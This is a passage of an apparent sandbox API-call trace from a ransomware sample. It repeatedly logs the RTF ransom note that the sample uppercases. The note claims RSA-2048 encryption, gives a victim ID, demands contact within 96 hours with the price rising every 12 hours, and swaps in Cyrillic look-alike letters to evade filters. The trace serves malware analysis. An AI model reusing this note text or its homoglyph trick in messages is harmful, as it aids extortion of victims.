m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r", cchLength=0x15f4 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET204 CALIBRI;}{\\F1\\FNIL\\FCHARSET0 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;}\r\n{\\*\\GENERATOR MSFTEDIT 5.41.21.2510;}\\VIEWKIND4\\UC1\\PARD\\RI-500\\SA200\\SL240\\SLMULT1\\TX8804\\B\\F0\\FS28\\'C0\\LANG1033\\F1 TT\\LANG1049\\F0\\'E5\\LANG1033\\F1 NTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0 ! \\'C0\\LANG1033\\F1 LL\\LANG1049\\F0 \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR\\LANG1049\\F0 \\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 \\LANG1033\\F1 W\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'E5 \\'E5\\LANG1033\\F1 N\\LANG1049\\F0\\'F1\\LANG1033\\F1 RY\\LANG1049\\F0\\'F0\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D WITH RS\\LANG1049\\F0\\'C0-\\LANG1033\\F1 2048 \\LANG1049\\F0\\'E0\\LANG1033\\F1 LG\\LANG1049\\F0\\'EE\\LANG1033\\F1 RITHM\\LANG1049\\F0 .\\PAR\r\n\\PARD\\RI-74\\SA200\\SL240\\SLMULT1\\TX8378\\LANG1033\\B0\\F1\\FS24 WITH\\LANG1049\\F0\\'EE\\LANG1033\\F1 UT \\LANG1049\\F0\\'F3\\'EE\\LANG1033\\F1 UR P\\LANG1049\\F0\\'E5\\LANG1033\\F1 RS\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0\\'E0\\LANG1033\\F1 L D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 PTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 IS IMP\\LANG1049\\F0\\'EE\\LANG1033\\F1 SSIBL\\LANG1049\\F0\\'E5\\LANG1033\\F1 !\\PAR\r\nT\\LANG1049\\F0\\'EE \\LANG1033\\F1 G\\LANG1049\\F0\\'E5\\LANG1033\\F1 T Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 T TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 , \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\LANG1033\\F1 TO S\\LANG1049\\F0\\'E5\\LANG1033\\F1 ND TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 F\\LANG1049\\F0\\'EE\\LANG1033\\F1 LL\\LANG1049\\F0\\'EE\\LANG1033\\F1 WING C\\LANG1049\\F0\\'EE\\LANG1033\\F1 D\\LANG1049\\F0\\'E5:\\PAR\r\n\\PARD\\SA200\\SL240\\SLMULT1\\LANG1033\\B\\F1\\FS28 [KID]\\LANG1049\\F0\\FS32\\PAR\r\n\\LANG1033\\B0\\F1\\FS24 T\\LANG1049\\F0\\'EE\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 UR \\LANG1049\\F0\\'E5\\LANG1033\\F1 -M\\LANG1049\\F0\\'E0\\LANG1033\\F1 IL \\LANG1049\\F0\\'E0\\LANG1033\\F1 DDR\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0 : \\LANG1033\\B\\F1\\FS28 [EML1]\\LANG1049\\B0\\F0\\FS32\\PAR\r\n\\LANG1033\\F1\\FS24 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 N Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U WILL R\\LANG1049\\F0\\'E5\\LANG1033\\F1 CI\\LANG1049\\F0\\'E5\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\'E0\\LANG1033\\F1 LL N\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0\\'E0\\LANG1033\\F1 RY INSTRU\\LANG1049\\F0\\'F1\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 NS\\LANG1049\\F0 .\\PAR\r\n\\CF1\\LANG1033\\B\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 NL\\LANG1049\\F0\\'F3\\LANG1033\\F1 \\LANG1049\\F0 96\\LANG1033\\F1 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS T\\LANG1049\\F0\\'EE\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 ! \\LANG1049\\F0\\'C0\\LANG1033\\F1 FT\\LANG1049\\F0\\'E5\\LANG1033\\F1 R THIS TIM\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\LANG1033\\F1 L\\LANG1049\\F0\\'E5\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0 D\\'E5\\'F1R\\'F3\\'F0TI\\'EEN WILL B\\'E5C\\'EEM\\'E5 IM\\'F0\\'EESSIBL\\'E5\\LANG1033\\F1 !\\PAR\r\nHURR\\LANG1049\\F0\\'F3\\LANG1033\\F1 U\\LANG1049\\F0\\'F0\\LANG1033\\F1 ! \\LANG1049\\F0\\'C5\\'E0\\'F1\\LANG1033\\F1 H 12 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS\\LANG1049\\F0 \\LANG1033\\F1 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 P\\LANG1049\\F0\\'E0\\'F3\\LANG1033\\F1 M\\LANG1049\\F0\\'E5\\LANG1033\\F1 NT SIZ\\LANG1049\\F0\\'E5\\LANG1033\\F1 WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 IN\\LANG1049\\F0\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\'E0\\LANG1033\\F1 S\\LANG1049\\F0\\'E5\\LANG1033\\F1 D B\\LANG1049\\F0\\'F3\\LANG1033\\F1 100$!\\LANG1049\\F0\\PAR\r\n\\CF0\\B0\\'C0LL TH\\'E5 \\'E0TT\\'E5MPTS \\'EEF D\\'E5\\'F1RYPTI\\'EEN BY Y\\'EEURS\\'E5LF WILL R\\'E5SULT \\'EENLY IN IRR\\'E5V\\'EE\\'F1\\'E0BLE L\\'EESS \\'EEF Y\\'EEUR D\\'E0T\\'E0.\\PAR\r\nIF Y\\'EEU STILL W\\'E0NT T\\'EE TRY T\\'EE D\\'E5CRYPT TH\\'E5M BY Y\\'EEURS\\'E5LF PL\\'E5\\'E0S\\'E5 M\\'E0K\\'E5 \\'E0 B\\'E0CKUP \\'E0T FIRST B\\'E5C\\'E0US\\'E5 TH\\'E5 D\\'E5\\'F1RYPTI\\'EEN WILL B\\'E5C\\'EEM\\'E5 IMP\\'EESSIBL\\'E5 IN C\\'E0S\\'E5 \\'EEF \\'E0NY CH\\'E0NG\\'E5S INSID\\'E5 TH\\'E5 FIL\\'E5S.\\PAR\r\nIF Y\\'EEU DID N\\'EET R\\'E5C\\'E5IV\\'E5 TH\\'E5 \\'E0NSW\\'E5R") returned 0x15f4 [0112.814] CharUpperBuffW (in: lpsz="[KID]", cchLength=0x5 | out: lpsz="[KID]") returned 0x5 [0112.814] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1370000 [0112.815] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 [EML1]\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu did n\\'eet r\\'e5c\\'", cchLength=0x1610 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET204 CALIBRI;}{\\F1\\FNIL\\FCHARSET0 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;}\r\n{\\*\\GENERATOR MSFTEDIT 5.41.21.2510;}\\VIEWKIND4\\UC1\\PARD\\RI-500\\SA200\\SL240\\SLMULT1\\TX8804\\B\\F0\\FS28\\'C0\\LANG1033\\F1 TT\\LANG1049\\F0\\'E5\\LANG1033\\F1 NTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0 ! \\'C0\\LANG1033\\F1 LL\\LANG1049\\F0 \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR\\LANG1049\\F0 \\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 \\LANG1033\\F1 W\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'E5 \\'E5\\LANG1033\\F1 N\\LANG1049\\F0\\'F1\\LANG1033\\F1 RY\\LANG1049\\F0\\'F0\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D WITH RS\\LANG1049\\F0\\'C0-\\LANG1033\\F1 2048 \\LANG1049\\F0\\'E0\\LANG1033\\F1 LG\\LANG1049\\F0\\'EE\\LANG1033\\F1 RITHM\\LANG1049\\F0 .\\PAR\r\n\\PARD\\RI-74\\SA200\\SL240\\SLMULT1\\TX8378\\LANG1033\\B0\\F1\\FS24 WITH\\LANG1049\\F0\\'EE\\LANG1033\\F1 UT \\LANG1049\\F0\\'F3\\'EE\\LANG1033\\F1 UR P\\LANG1049\\F0\\'E5\\LANG1033\\F1 RS\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0\\'E0\\LANG1033\\F1 L D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 PTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 IS IMP\\LANG1049\\F0\\'EE\\LANG1033\\F1 SSIBL\\LANG1049\\F0\\'E5\\LANG1033\\F1 !\\PAR\r\nT\\LANG1049\\F0\\'EE \\LANG1033\\F1 G\\LANG1049\\F0\\'E5\\LANG1033\\F1 T Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 T TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 , \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\LANG1033\\F1 TO S\\LANG1049\\F0\\'E5\\LANG1033\\F1 ND TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 F\\LANG1049\\F0\\'EE\\LANG1033\\F1 LL\\LANG1049\\F0\\'EE\\LANG1033\\F1 WING C\\LANG1049\\F0\\'EE\\LANG1033\\F1 D\\LANG1049\\F0\\'E5:\\PAR\r\n\\PARD\\SA200\\SL240\\SLMULT1\\LANG1033\\B\\F1\\FS28 COSLB0CVD9BCX1VP-3188F4D96148D062\\LANG1049\\F0\\FS32\\PAR\r\n\\LANG1033\\B0\\F1\\FS24 T\\LANG1049\\F0\\'EE\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 UR \\LANG1049\\F0\\'E5\\LANG1033\\F1 -M\\LANG1049\\F0\\'E0\\LANG1033\\F1 IL \\LANG1049\\F0\\'E0\\LANG1033\\F1 DDR\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0 : \\LANG1033\\B\\F1\\FS28 [EML1]\\LANG1049\\B0\\F0\\FS32\\PAR\r\n\\LANG1033\\F1\\FS24 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 N Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U WILL R\\LANG1049\\F0\\'E5\\LANG1033\\F1 CI\\LANG1049\\F0\\'E5\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\'E0\\LANG1033\\F1 LL N\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0\\'E0\\LANG1033\\F1 RY INSTRU\\LANG1049\\F0\\'F1\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 NS\\LANG1049\\F0 .\\PAR\r\n\\CF1\\LANG1033\\B\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 NL\\LANG1049\\F0\\'F3\\LANG1033\\F1 \\LANG1049\\F0 96\\LANG1033\\F1 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS T\\LANG1049\\F0\\'EE\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 ! \\LANG1049\\F0\\'C0\\LANG1033\\F1 FT\\LANG1049\\F0\\'E5\\LANG1033\\F1 R THIS TIM\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\LANG1033\\F1 L\\LANG1049\\F0\\'E5\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0 D\\'E5\\'F1R\\'F3\\'F0TI\\'EEN WILL B\\'E5C\\'EEM\\'E5 IM\\'F0\\'EESSIBL\\'E5\\LANG1033\\F1 !\\PAR\r\nHURR\\LANG1049\\F0\\'F3\\LANG1033\\F1 U\\LANG1049\\F0\\'F0\\LANG1033\\F1 ! \\LANG1049\\F0\\'C5\\'E0\\'F1\\LANG1033\\F1 H 12 